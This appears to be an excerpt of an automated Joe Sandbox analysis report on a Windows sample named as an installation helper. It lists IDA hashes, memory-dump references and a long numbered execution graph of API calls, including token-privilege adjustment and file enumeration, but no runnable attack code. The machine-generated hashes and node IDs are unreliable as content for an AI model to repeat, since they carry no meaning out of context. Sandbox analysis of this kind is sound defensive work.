                                • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                • Instruction Fuzzy Hash: F7E0ED32A119209BDB049F49C920BDEF7A5EF45724F11001EE011A3F42CBB1AC848784
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @ K$DJ$T)K$X/K
                                • API String ID: 0-3815299647
                                • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                • Instruction ID: 92dd96c4deea6f8221d8e5bfab7e62c923d18587bd5dae42488c871e53a7d946
                                • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                • Instruction Fuzzy Hash: 9291C1346143459BCF00DEA4CE617EA73E2AF4130CF28841DE86A9BB85DB75A9CDCB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: D)K$H)K$P)K$T)K
                                • API String ID: 0-2262112463
                                • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                • Instruction ID: 5a50d83a590f3015f0a648721e32a808d69a25a304082065a56f7152fbfa09d4
                                • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                • Instruction Fuzzy Hash: 1051E23191421A9FCF01CFA4DA52ADEB7F1AF0531CF14441AE82AA7B90DB7199CCCB54

                                Execution Graph

                                Execution Coverage:4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0.4%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:35
                                execution_graph 73230 a9a42c 73231 a9a449 73230->73231 73232 a9a435 fputs 73230->73232 73389 a9545d 73231->73389 73388 a61fa0 fputc 73232->73388 73239 a9a4c9 73458 a61e40 free 73239->73458 73241 a9a4d8 73242 a9a4ee 73241->73242 73459 a9c7d7 73241->73459 73244 a9a50e 73242->73244 73467 a957fb 73242->73467 73477 a9c73e 73244->73477 73249 a9ac17 73666 a92db9 free ctype 73249->73666 73253 a9ac23 73255 a9ac3a 73253->73255 73258 a9ac35 73253->73258 73254 a9a54d 73500 a62fec 73254->73500 73668 a9b96d _CxxThrowException 73255->73668 73667 a9b988 33 API calls __aulldiv 73258->73667 73259 a9ac42 73669 a61e40 free 73259->73669 73263 a9ac4d 73670 a83247 73263->73670 73266 a9a586 73506 a9ad06 73266->73506 73270 a9ac7d 73677 a611c2 free __EH_prolog ctype 73270->73677 73274 a9ac89 73678 a9be0c free __EH_prolog ctype 73274->73678 73278 a62e04 2 API calls 73280 a9a636 73278->73280 73279 a9ac98 73679 a92db9 free ctype 73279->73679 73524 a84345 73280->73524 73282 a9aca4 73285 a9a676 73530 a82096 73285->73530 73288 a9a66f 73626 a9b96d _CxxThrowException 73288->73626 73291 a9a6e2 73293 a9a722 73291->73293 73627 a61fa0 fputc 73291->73627 73292 a9c7d7 ctype 6 API calls 73292->73291 73294 a9a79e 73293->73294 73642 a61fa0 fputc 73293->73642 73298 a9a6fa fputs 73365 a9aae5 73665 a92db9 free ctype 73365->73665 73388->73231 73390 a95473 73389->73390 73391 a95466 73389->73391 73393 a62e04 73390->73393 73680 a6275e malloc _CxxThrowException free ctype 73391->73680 73394 a61e0c ctype 2 API calls 73393->73394 73395 a62e11 73394->73395 73396 a81858 73395->73396 73397 a81862 __EH_prolog 73396->73397 73681 a8021a 73397->73681 73402 a818b9 73695 a81aa5 free __EH_prolog ctype 73402->73695 73404 a81935 73706 a81aa5 free __EH_prolog ctype 73404->73706 73405 a818c7 73696 a92db9 free ctype 73405->73696 73408 a81944 73430 a81966 73408->73430 73707 a81d73 5 API calls __EH_prolog 73408->73707 73410 a818d3 73410->73239 73413 a81958 _CxxThrowException 73413->73430 73414 a819be 73714 a8f1f1 malloc _CxxThrowException free _CxxThrowException 73414->73714 73416 a818db 73416->73404 73697 a80144 malloc _CxxThrowException free _CxxThrowException 73416->73697 73698 aa04d2 73416->73698 73704 a61524 malloc _CxxThrowException __EH_prolog ctype 73416->73704 73705 a61e40 free 73416->73705 73418 a62e04 2 API calls 73418->73430 73420 a819d6 73715 a87ebb 73420->73715 73424 aa04d2 5 API calls 73424->73430 73428 a87ebb free 73429 a819f7 73428->73429 73431 a712d4 4 API calls 73429->73431 73430->73414 73430->73418 73430->73424 73708 a6631f 73430->73708 73712 a61524 malloc _CxxThrowException __EH_prolog ctype 73430->73712 73713 a61e40 free 73430->73713 73440 a819ff 73431->73440 73433 a81a4f 73728 a61e40 free 73433->73728 73434 a61524 malloc _CxxThrowException 73434->73440 73436 a81a57 73729 a92db9 free ctype 73436->73729 73438 a81a64 73730 a92db9 free ctype 73438->73730 73440->73433 73440->73434 73442 a81a83 73440->73442 73727 a642e3 CharUpperW 73440->73727 73731 a81d73 5 API calls __EH_prolog 73442->73731 73444 a81a97 _CxxThrowException 73445 a81aa5 __EH_prolog 73444->73445 73732 a61e40 free 73445->73732 73447 a81ac8 73733 a802e8 free ctype 73447->73733 73449 a81ad1 73734 a81eab free __EH_prolog ctype 73449->73734 73451 a81add 73735 a61e40 free 73451->73735 73453 a81ae5 73736 a61e40 free 73453->73736 73455 a81aed 73737 a92db9 free ctype 73455->73737 73457 a81afa 73457->73239 73458->73241 73460 a9c7ea 73459->73460 73462 a9c849 73459->73462 73465 a9c7fe fputs 73460->73465 74212 a625cb malloc _CxxThrowException free _CxxThrowException ctype 73460->74212 73461 a9c85a 73461->73242 73462->73461 74213 a61f91 fflush 73462->74213 73465->73462 73469 a95805 __EH_prolog 73467->73469 73468 a95847 73468->73244 73469->73468 74214 a626dd 73469->74214 73475 a9583f 74234 a61e40 free 73475->74234 73478 a9c748 __EH_prolog 73477->73478 73479 a9c7d7 ctype 6 API calls 73478->73479 73480 a9c75d 73479->73480 74273 a61e40 free 73480->74273 73482 a9c768 74274 a82c0b 73482->74274 73486 a9c77d 74280 a61e40 free 73486->74280 73488 a9c785 74281 a61e40 free 73488->74281 73490 a9c78d 74282 a61e40 free 73490->74282 73492 a9c795 73493 a82c0b ctype free 73492->73493 73494 a9a51d 73493->73494 73494->73365 73495 a61e0c 73494->73495 73496 a61e15 73495->73496 73497 a61e1c malloc 73495->73497 73496->73497 73498 a61e3e 73497->73498 73499 a61e2a _CxxThrowException 73497->73499 73498->73254 73624 a9b0fa malloc _CxxThrowException __EH_prolog 73498->73624 73499->73498 73501 a62ffc 73500->73501 73502 a62ff8 73500->73502 73501->73502 73503 a61e0c ctype 2 API calls 73501->73503 73502->73266 73504 a63010 73503->73504 74285 a61e40 free 73504->74285 74286 a9ad29 73506->74286 73509 a9bf3e 73510 a62fec 3 API calls 73509->73510 73511 a9bf85 73510->73511 73512 a62fec 3 API calls 73511->73512 73513 a9a5ee 73512->73513 73514 a73a29 73513->73514 73515 a73a3b 73514->73515 73519 a73a37 73514->73519 74292 a73bd9 free ctype 73515->74292 73517 a73a42 73518 a73a6f 73517->73518 73520 a73a67 73517->73520 73521 a73a52 _CxxThrowException 73517->73521 73518->73519 74294 a73b76 malloc _CxxThrowException __EH_prolog ctype 73518->74294 73519->73278 74293 aa0551 malloc _CxxThrowException free memcpy ctype 73520->74293 73521->73520 73525 a8434f __EH_prolog 73524->73525 73526 a62e04 2 API calls 73525->73526 73527 a8436d 73526->73527 73528 a62e04 2 API calls 73527->73528 73529 a84379 73528->73529 73529->73285 73625 a8375c 22 API calls 2 library calls 73529->73625 73544 a820a0 __EH_prolog 73530->73544 73531 a821f0 73532 a82209 73531->73532 73535 a61e0c ctype 2 API calls 73531->73535 73533 a61e0c ctype 2 API calls 73532->73533 73536 a82235 73533->73536 73534 a62e04 2 API calls 73534->73544 73535->73532 73537 a82248 73536->73537 74295 a74250 73536->74295 74313 a82c22 73537->74313 73540 a62f1c 2 API calls 73540->73544 73542 a66c72 44 API calls 73542->73544 73543 a8224c 74491 a6757d GetLastError 73543->74491 73544->73531 73544->73534 73544->73540 73544->73542 73544->73543 73545 a82251 73544->73545 73547 a61e40 free ctype 73544->73547 74490 a7089e malloc _CxxThrowException free _CxxThrowException memcpy 73544->74490 74492 a82c6c 6 API calls 2 library calls 73545->74492 73547->73544 73550 a82277 74493 a61e40 free 73550->74493 73552 a82347 74512 a61e40 free 73552->74512 73554 a8227f 74494 a61e40 free 73554->74494 73555 a62e04 2 API calls 73602 a8232b 73555->73602 73556 a82a55 74513 a61e40 free 73556->74513 73559 a82287 74495 a61e40 free 73559->74495 73560 a8228f 73560->73291 73560->73292 73562 a66c72 44 API calls 73562->73602 73563 a82969 74509 a6757d GetLastError 73563->74509 73565 a8296e 73566 a82836 74500 a61e40 free 73566->74500 73574 a62fec malloc _CxxThrowException free 73574->73602 73575 a82855 74501 a61e40 free 73575->74501 73577 a82860 73579 a83247 free 73577->73579 73578 a8289d 74503 a61e40 free 73578->74503 73583 a828a8 73585 a83247 free 73583->73585 73589 a83247 free 73589->73602 73592 a62f1c 2 API calls 73592->73602 73597 a828e6 74505 a61e40 free 73597->74505 73601 a828f1 73603 a83247 free 73601->73603 73602->73552 73602->73555 73602->73562 73602->73563 73602->73566 73602->73574 73602->73575 73602->73578 73602->73589 73602->73592 73602->73597 73604 a82921 73602->73604 73608 a61e40 free ctype 73602->73608 73617 a61fa0 fputc 73602->73617 74317 a747dd 73602->74317 74321 a96086 73602->74321 74333 a82b09 73602->74333 74339 a831d8 73602->74339 74345 a82a72 73602->74345 74349 a96359 73602->74349 74392 a82cdb 73602->74392 74478 a82bb5 73602->74478 74496 a73e26 30 API calls 2 library calls 73602->74496 74497 a66456 9 API calls 2 library calls 73602->74497 74498 a6859e malloc _CxxThrowException free _CxxThrowException 73602->74498 74499 a8204d CharUpperW 73602->74499 74507 a61e40 free 73604->74507 73608->73602 73610 a8292c 73612 a83247 free 73610->73612 73617->73602 73624->73254 73625->73288 73626->73285 73627->73298 73665->73249 73666->73253 73667->73255 73668->73259 73669->73263 73671 a8324e 73670->73671 73672 a83260 73671->73672 75731 a61e40 free 73671->75731 75730 a61e40 free 73672->75730 73675 a83267 73676 a61e40 free 73675->73676 73676->73270 73677->73274 73678->73279 73679->73282 73680->73390 73682 a80224 __EH_prolog 73681->73682 73738 a73d66 73682->73738 73685 a8062e 73687 a80638 __EH_prolog 73685->73687 73686 a806de 73825 a8019a malloc _CxxThrowException free memcpy 73686->73825 73687->73686 73691 a801bc malloc _CxxThrowException free _CxxThrowException memcpy 73687->73691 73694 a806ee 73687->73694 73754 a80703 73687->73754 73824 a92db9 free ctype 73687->73824 73689 a806e6 73826 a81453 26 API calls 2 library calls 73689->73826 73691->73687 73694->73402 73694->73416 73695->73405 73696->73410 73697->73416 73699 aa04df 73698->73699 73700 aa0513 73698->73700 73701 aa04e8 _CxxThrowException 73699->73701 73702 aa04fd 73699->73702 73700->73416 73701->73702 74158 aa0551 malloc _CxxThrowException free memcpy ctype 73702->74158 73704->73416 73705->73416 73706->73408 73707->73413 73709 a69245 73708->73709 74159 a690da 73709->74159 73712->73430 73713->73430 73714->73420 73716 a819e1 73715->73716 73717 a87ec6 73715->73717 73719 a712d4 73716->73719 73717->73716 73718 a61e40 free ctype 73717->73718 73718->73717 73720 a712e7 73719->73720 73726 a71327 73719->73726 73721 a71304 73720->73721 73722 a712ef _CxxThrowException 73720->73722 74211 a61e40 free 73721->74211 73722->73721 73724 a7130b 73725 a61e0c ctype 2 API calls 73724->73725 73725->73726 73726->73428 73727->73440 73728->73436 73729->73438 73730->73410 73731->73444 73732->73447 73733->73449 73734->73451 73735->73453 73736->73455 73737->73457 73749 affb10 73738->73749 73740 a73d70 GetCurrentProcess 73750 a73e04 73740->73750 73742 a73d8d OpenProcessToken 73743 a73de3 73742->73743 73744 a73d9e LookupPrivilegeValueW 73742->73744 73746 a73e04 CloseHandle 73743->73746 73744->73743 73745 a73dc0 AdjustTokenPrivileges 73744->73745 73745->73743 73747 a73dd5 GetLastError 73745->73747 73748 a73def 73746->73748 73747->73743 73748->73685 73749->73740 73751 a73e11 CloseHandle 73750->73751 73752 a73e0d 73750->73752 73753 a73e21 73751->73753 73752->73742 73753->73742 73780 a8070d __EH_prolog 73754->73780 73755 a80e1d 73868 a80416 18 API calls 2 library calls 73755->73868 73757 a80ea6 73870 aaec78 free ctype 73757->73870 73758 a80d11 73859 a67496 7 API calls 2 library calls 73758->73859 73761 a80c13 73856 a61e40 free 73761->73856 73765 a80c83 73765->73755 73765->73758 73766 a80b40 73766->73687 73767 a80de0 73864 a92db9 free ctype 73767->73864 73768 a62da9 2 API calls 73788 a80ab5 73768->73788 73769 a80e47 73769->73757 73869 a8117d 68 API calls 2 library calls 73769->73869 73773 a62e04 2 API calls 73773->73780 73774 a62e04 2 API calls 73774->73788 73777 a80e02 73867 a92db9 free ctype 73777->73867 73779 a62e04 2 API calls 73782 a80d29 73779->73782 73780->73765 73780->73766 73780->73773 73783 a62fec 3 API calls 73780->73783 73780->73788 73798 a80b26 73780->73798 73801 aa04d2 malloc _CxxThrowException free _CxxThrowException memcpy 73780->73801 73812 a92db9 free ctype 73780->73812 73819 a80b48 73780->73819 73821 a61524 malloc _CxxThrowException 73780->73821 73822 a61e40 free ctype 73780->73822 73827 a62da9 73780->73827 73830 a62f4a malloc _CxxThrowException free ctype 73780->73830 73831 a61089 malloc _CxxThrowException free _CxxThrowException 73780->73831 73832 a813eb 5 API calls 2 library calls 73780->73832 73833 a8050b 73780->73833 73838 a80021 GetLastError 73780->73838 73839 a649bd 9 API calls 2 library calls 73780->73839 73840 a80306 12 API calls 73780->73840 73841 a7ff00 5 API calls 2 library calls 73780->73841 73842 a8057d 16 API calls 2 library calls 73780->73842 73843 a80f8e 24 API calls 2 library calls 73780->73843 73844 a6472e CharUpperW 73780->73844 73845 a78984 malloc _CxxThrowException free _CxxThrowException memcpy 73780->73845 73846 a80ef4 68 API calls 2 library calls 73780->73846 73782->73767 73782->73779 73787 a62fec 3 API calls 73782->73787 73795 a80df3 73782->73795 73796 a61e40 free ctype 73782->73796 73800 a80df8 73782->73800 73860 a62f1c 73782->73860 73863 a8117d 68 API calls 2 library calls 73782->73863 73783->73780 73787->73782 73788->73761 73788->73768 73788->73774 73789 a62fec 3 API calls 73788->73789 73793 a8050b 44 API calls 73788->73793 73803 a80c79 73788->73803 73810 a61e40 free ctype 73788->73810 73847 a62f4a malloc _CxxThrowException free ctype 73788->73847 73852 a61089 malloc _CxxThrowException free _CxxThrowException 73788->73852 73853 a813eb 5 API calls 2 library calls 73788->73853 73854 a80ef4 68 API calls 2 library calls 73788->73854 73855 a92db9 free ctype 73788->73855 73857 a80021 GetLastError 73788->73857 73789->73788 73793->73788 73865 a61e40 free 73795->73865 73796->73782 73848 a61e40 free 73798->73848 73866 a61e40 free 73800->73866 73801->73780 73858 a61e40 free 73803->73858 73804 a80b30 73849 a61e40 free 73804->73849 73808 a80b38 73850 a61e40 free 73808->73850 73810->73788 73812->73780 73851 a92db9 free ctype 73819->73851 73821->73780 73822->73780 73824->73687 73825->73689 73826->73694 73871 a62d4d 73827->73871 73829 a62dc6 73829->73780 73830->73780 73831->73780 73832->73780 73877 a66c72 73833->73877 73835 a80575 73835->73780 73838->73780 73839->73780 73840->73780 73841->73780 73842->73780 73843->73780 73844->73780 73845->73780 73846->73780 73847->73788 73848->73804 73849->73808 73850->73766 73851->73798 73852->73788 73853->73788 73854->73788 73855->73788 73856->73766 73857->73788 73858->73765 73859->73782 73861 a62ba6 2 API calls 73860->73861 73862 a62f2c 73861->73862 73862->73782 73863->73782 73864->73766 73865->73800 73866->73777 73867->73766 73868->73769 73869->73769 73870->73766 73874 a62ba6 73871->73874 73873 a62d68 73873->73829 73873->73873 73875 a61e0c ctype 2 API calls 73874->73875 73876 a62bbb 73875->73876 73876->73873 73879 a66c7c __EH_prolog 73877->73879 73878 a66cd3 73881 a66ce2 73878->73881 73884 a66d87 73878->73884 73879->73878 73880 a66cb7 73879->73880 73882 a62f88 3 API calls 73880->73882 73883 a62f88 3 API calls 73881->73883 73908 a66cc7 73882->73908 73888 a66cf5 73883->73888 73893 a66f4a 73884->73893 74005 a62e47 73884->74005 73887 a62e47 2 API calls 73898 a66dc0 73887->73898 73889 a66d4a 73888->73889 73891 a66d0b 73888->73891 74001 a67b41 28 API calls 73889->74001 74000 a69252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73891->74000 73892 a66d5f 74002 a6764c 73892->74002 73894 a66fd1 73893->73894 73896 a66f7e 73893->73896 73900 a670e5 73894->73900 73901 a66fed 73894->73901 73922 a6701d 73894->73922 74023 a66bf5 11 API calls 2 library calls 73896->74023 73897 a66d36 73897->73889 73903 a66d3a 73897->73903 73913 a66dfe 73898->73913 74009 a63221 malloc _CxxThrowException free _CxxThrowException 73898->74009 73984 a66868 73900->73984 74025 a66bf5 11 API calls 2 library calls 73901->74025 73903->73908 73907 a66f85 73907->73900 73911 a66f99 73907->73911 73908->73835 73978 a62f88 73908->73978 73909 a66ff2 73909->73900 73914 a67006 73909->73914 73910 a66fca 73917 a66848 FindClose 73910->73917 73918 a62f88 3 API calls 73911->73918 73912 a66e43 73916 a66c72 42 API calls 73912->73916 73913->73912 73925 a66e1e 73913->73925 73914->73910 73920 a66e4e 73916->73920 73917->73908 73921 a66fb0 73918->73921 73923 a66e41 73920->73923 73924 a66f3a 73920->73924 74024 a6717b 13 API calls 73921->74024 73922->73900 74026 a6717b 13 API calls 73922->74026 73931 a62f1c 2 API calls 73923->73931 74021 a61e40 free 73924->74021 73925->73923 73928 a62fec 3 API calls 73925->73928 73928->73923 73930 a67052 73934 a67056 73930->73934 73935 a67064 73930->73935 73936 a66e77 73931->73936 73932 a66f42 74022 a61e40 free 73932->74022 73937 a62f88 3 API calls 73934->73937 73939 a62e47 2 API calls 73935->73939 73938 a62e04 2 API calls 73936->73938 73941 a6705f 73937->73941 73964 a66e83 73938->73964 73940 a6706d 73939->73940 74027 a61089 malloc _CxxThrowException free _CxxThrowException 73940->74027 73945 a66848 FindClose 73941->73945 73944 a6707b 74028 a61089 malloc _CxxThrowException free _CxxThrowException 73944->74028 73945->73908 73946 a66ecf 74014 a61e40 free 73946->74014 73948 a66ec7 SetLastError 73948->73946 73949 a67085 73952 a66868 12 API calls 73949->73952 73954 a67095 73952->73954 73953 a66f11 74015 a61e40 free 73953->74015 73957 a670bb 73954->73957 73958 a67099 wcscmp 73954->73958 73955 a66ed3 74013 a631e5 malloc _CxxThrowException free _CxxThrowException 73955->74013 74029 a66bf5 11 API calls 2 library calls 73957->74029 73958->73957 73961 a670b1 73958->73961 73960 a66f19 74016 a66848 73960->74016 73967 a62f88 3 API calls 73961->73967 73964->73946 73964->73948 73964->73955 73968 a62e04 2 API calls 73964->73968 74010 a66bb5 17 API calls 73964->74010 74011 a622bf CharUpperW 73964->74011 74012 a61e40 free 73964->74012 73966 a670c6 73972 a670d8 73966->73972 73976 a67129 73966->73976 73970 a6714c 73967->73970 73968->73964 74032 a61e40 free 73970->74032 74030 a61e40 free 73972->74030 73975 a66f2b 74020 a61e40 free 73975->74020 73976->73961 73979 a62f9a 73978->73979 73980 a62fbe 73979->73980 73981 a61e0c ctype 2 API calls 73979->73981 73980->73835 73982 a62fb4 73981->73982 74157 a61e40 free 73982->74157 73985 a66872 __EH_prolog 73984->73985 73986 a66848 FindClose 73985->73986 73988 a66880 73986->73988 73987 a668f6 73987->73910 74031 a6717b 13 API calls 73987->74031 73988->73987 73989 a6689b FindFirstFileW 73988->73989 73990 a668a9 73988->73990 73989->73990 73991 a668ee 73990->73991 73992 a62e04 2 API calls 73990->73992 73991->73987 74039 a66919 malloc _CxxThrowException free 73991->74039 73994 a668ba 73992->73994 74033 a68b4a 73994->74033 73996 a668d0 73997 a668d4 FindFirstFileW 73996->73997 73998 a668e2 73996->73998 73997->73998 74038 a61e40 free 73998->74038 74000->73897 74001->73892 74003 a67656 CloseHandle 74002->74003 74004 a67661 74002->74004 74003->74004 74004->73908 74006 a62e57 74005->74006 74007 a62ba6 2 API calls 74006->74007 74008 a62e6a 74007->74008 74008->73887 74009->73913 74010->73964 74011->73964 74012->73964 74013->73946 74014->73953 74015->73960 74017 a66852 FindClose 74016->74017 74018 a6685d 74016->74018 74017->74018 74019 a61e40 free 74018->74019 74019->73975 74020->73908 74021->73932 74022->73893 74023->73907 74024->73910 74025->73909 74026->73930 74027->73944 74028->73949 74029->73966 74030->73909 74031->73910 74032->73941 74040 a68b80 74033->74040 74036 a62f88 3 API calls 74037 a68b6e 74036->74037 74037->73996 74038->73991 74039->73987 74042 a68b8a __EH_prolog 74040->74042 74041 a68b55 74041->74036 74041->74037 74042->74041 74043 a68c7b 74042->74043 74049 a68be1 74042->74049 74044 a68d23 74043->74044 74046 a68c8f 74043->74046 74045 a68e8a 74044->74045 74048 a68d3b 74044->74048 74047 a62e47 2 API calls 74045->74047 74046->74048 74054 a68c9e 74046->74054 74050 a68e96 74047->74050 74051 a62e04 2 API calls 74048->74051 74049->74041 74052 a62e47 2 API calls 74049->74052 74058 a62e47 2 API calls 74050->74058 74053 a68d43 74051->74053 74055 a68c05 74052->74055 74137 a66332 6 API calls 2 library calls 74053->74137 74057 a62e47 2 API calls 74054->74057 74062 a68c17 74055->74062 74063 a68c24 74055->74063 74066 a68ca7 74057->74066 74060 a68eb8 74058->74060 74059 a68d52 74061 a68d56 74059->74061 74138 a6859e malloc _CxxThrowException free _CxxThrowException 74059->74138 74149 a68f57 memmove 74060->74149 74148 a61e40 free 74061->74148 74127 a61e40 free 74062->74127 74069 a62e47 2 API calls 74063->74069 74071 a62e47 2 API calls 74066->74071 74068 a68ec4 74072 a68ede 74068->74072 74073 a68ec8 74068->74073 74074 a68c35 74069->74074 74075 a68cd0 74071->74075 74152 a63221 malloc _CxxThrowException free _CxxThrowException 74072->74152 74150 a61e40 free 74073->74150 74128 a68f57 memmove 74074->74128 74132 a68f57 memmove 74075->74132 74080 a68ed0 74151 a61e40 free 74080->74151 74081 a68c41 74085 a68c6b 74081->74085 74129 a631e5 malloc _CxxThrowException free _CxxThrowException 74081->74129 74082 a68eeb 74153 a631e5 malloc _CxxThrowException free _CxxThrowException 74082->74153 74083 a68cdc 74088 a68d13 74083->74088 74133 a63221 malloc _CxxThrowException free _CxxThrowException 74083->74133 74131 a61e40 free 74085->74131 74136 a61e40 free 74088->74136 74090 a68f06 74154 a631e5 malloc _CxxThrowException free _CxxThrowException 74090->74154 74091 a68c73 74156 a61e40 free 74091->74156 74094 a68c60 74130 a631e5 malloc _CxxThrowException free _CxxThrowException 74094->74130 74096 a68ced 74134 a631e5 malloc _CxxThrowException free _CxxThrowException 74096->74134 74097 a62e04 2 API calls 74098 a68ddf 74097->74098 74102 a68e0e 74098->74102 74105 a68df1 74098->74105 74100 a68f11 74155 a61e40 free 74100->74155 74106 a62f88 3 API calls 74102->74106 74139 a63199 malloc _CxxThrowException free _CxxThrowException 74105->74139 74110 a68e0c 74106->74110 74107 a68d65 74107->74061 74107->74097 74108 a68d08 74135 a631e5 malloc _CxxThrowException free _CxxThrowException 74108->74135 74141 a68f57 memmove 74110->74141 74112 a68e03 74140 a63199 malloc _CxxThrowException free _CxxThrowException 74112->74140 74115 a68e22 74116 a68e26 74115->74116 74117 a68e3b 74115->74117 74142 a63221 malloc _CxxThrowException free _CxxThrowException 74115->74142 74147 a61e40 free 74116->74147 74143 a68f34 malloc _CxxThrowException 74117->74143 74121 a68e49 74144 a631e5 malloc _CxxThrowException free _CxxThrowException 74121->74144 74123 a68e56 74145 a61e40 free 74123->74145 74125 a68e62 74146 a631e5 malloc _CxxThrowException free _CxxThrowException 74125->74146 74127->74041 74128->74081 74129->74094 74130->74085 74131->74091 74132->74083 74133->74096 74134->74108 74135->74088 74136->74091 74137->74059 74138->74107 74139->74112 74140->74110 74141->74115 74142->74117 74143->74121 74144->74123 74145->74125 74146->74116 74147->74061 74148->74041 74149->74068 74150->74080 74151->74041 74152->74082 74153->74090 74154->74100 74155->74091 74156->74041 74157->73980 74158->73700 74160 a690e4 __EH_prolog 74159->74160 74161 a62f88 3 API calls 74160->74161 74162 a690f7 74161->74162 74163 a6915d 74162->74163 74167 a69109 74162->74167 74164 a62e04 2 API calls 74163->74164 74165 a69165 74164->74165 74166 a691be 74165->74166 74168 a69174 74165->74168 74205 a66332 6 API calls 2 library calls 74166->74205 74171 a62e47 2 API calls 74167->74171 74183 a69155 74167->74183 74172 a62f88 3 API calls 74168->74172 74170 a6917d 74197 a691ca 74170->74197 74203 a6859e malloc _CxxThrowException free _CxxThrowException 74170->74203 74173 a69122 74171->74173 74172->74170 74200 a68f57 memmove 74173->74200 74177 a69185 74182 a62e04 2 API calls 74177->74182 74178 a6912e 74179 a6914d 74178->74179 74201 a631e5 malloc _CxxThrowException free _CxxThrowException 74178->74201 74202 a61e40 free 74179->74202 74184 a69197 74182->74184 74183->73430 74185 a691ce 74184->74185 74186 a6919f 74184->74186 74187 a62f88 3 API calls 74185->74187 74188 a691b9 74186->74188 74204 a61089 malloc _CxxThrowException free _CxxThrowException 74186->74204 74187->74188 74206 a63199 malloc _CxxThrowException free _CxxThrowException 74188->74206 74191 a691e6 74207 a68f57 memmove 74191->74207 74193 a691ee 74194 a691f2 74193->74194 74196 a62fec 3 API calls 74193->74196 74209 a61e40 free 74194->74209 74198 a69212 74196->74198 74210 a61e40 free 74197->74210 74208 a631e5 malloc _CxxThrowException free _CxxThrowException 74198->74208 74200->74178 74201->74179 74202->74183 74203->74177 74204->74188 74205->74170 74206->74191 74207->74193 74208->74194 74209->74197 74210->74183 74211->73724 74212->73465 74213->73461 74215 a61e0c ctype 2 API calls 74214->74215 74216 a626ea 74215->74216 74217 a95678 74216->74217 74218 a95689 74217->74218 74219 a956b1 74217->74219 74220 a95593 6 API calls 74218->74220 74235 a95593 74219->74235 74223 a956a5 74220->74223 74249 a628a1 74223->74249 74227 a9570e fputs 74233 a61fa0 fputc 74227->74233 74229 a956ef 74230 a95593 6 API calls 74229->74230 74231 a95701 74230->74231 74232 a95711 6 API calls 74231->74232 74232->74227 74233->73475 74234->73468 74236 a955ad 74235->74236 74237 a628a1 5 API calls 74236->74237 74238 a955b8 74237->74238 74254 a6286d 74238->74254 74241 a628a1 5 API calls 74242 a955c7 74241->74242 74243 a95711 74242->74243 74244 a956e0 74243->74244 74245 a95721 74243->74245 74244->74227 74253 a62881 malloc _CxxThrowException free memcpy _CxxThrowException 74244->74253 74246 a628a1 5 API calls 74245->74246 74247 a9572b 74246->74247 74262 a955cd 6 API calls 74247->74262 74250 a628b0 74249->74250 74263 a6267f 74250->74263 74252 a628bf 74252->74219 74253->74229 74257 a61e9d 74254->74257 74258 a61ead 74257->74258 74259 a61ea8 74257->74259 74258->74241 74261 a6263c malloc _CxxThrowException free memcpy _CxxThrowException 74259->74261 74261->74258 74262->74244 74264 a626c2 74263->74264 74265 a62693 74263->74265 74264->74252 74266 a626c8 _CxxThrowException 74265->74266 74267 a626bc 74265->74267 74268 a626dd 74266->74268 74272 a62595 malloc _CxxThrowException free memcpy ctype 74267->74272 74269 a61e0c ctype 2 API calls 74268->74269 74271 a626ea 74269->74271 74271->74252 74272->74264 74273->73482 74283 a61e40 free 74274->74283 74276 a82c16 74284 a61e40 free 74276->74284 74278 a82c1e 74279 a61e40 free 74278->74279 74279->73486 74280->73488 74281->73490 74282->73492 74283->74276 74284->74278 74285->73502 74287 a9ad33 __EH_prolog 74286->74287 74288 a62e04 2 API calls 74287->74288 74289 a9ad5f 74288->74289 74290 a62e04 2 API calls 74289->74290 74291 a9a5d8 74290->74291 74291->73509 74292->73517 74293->73518 74294->73518 74296 a7425a __EH_prolog 74295->74296 74297 a62e04 2 API calls 74296->74297 74298 a742c4 74297->74298 74299 a62e04 2 API calls 74298->74299 74300 a742d0 74299->74300 74514 a7440b 74300->74514 74314 a82c2e 74313->74314 74315 a82c35 74313->74315 74316 a61e0c ctype 2 API calls 74314->74316 74315->73602 74316->74315 74318 a747ee 74317->74318 74319 a747f4 74317->74319 74525 a61e40 free 74318->74525 74319->73602 74322 a96092 74321->74322 74323 a9612c 74322->74323 74526 a95d3c 74322->74526 74323->73602 74334 a82b13 __EH_prolog 74333->74334 74335 a62e04 2 API calls 74334->74335 74341 a831e2 __EH_prolog 74339->74341 74340 a83234 74340->73602 74341->74340 74342 a61e0c ctype 2 API calls 74341->74342 74343 a83216 74342->74343 74343->74340 74346 a82a82 74345->74346 74347 a62e04 2 API calls 74346->74347 74348 a82a9f 74347->74348 74348->73602 74350 a96363 __EH_prolog 74349->74350 74351 a9637f 74350->74351 74352 a9c7d7 ctype 6 API calls 74350->74352 74566 a95a4d 74351->74566 74352->74351 74393 a82ce5 __EH_prolog 74392->74393 74394 a62f1c 2 API calls 74393->74394 74479 a82bbf __EH_prolog 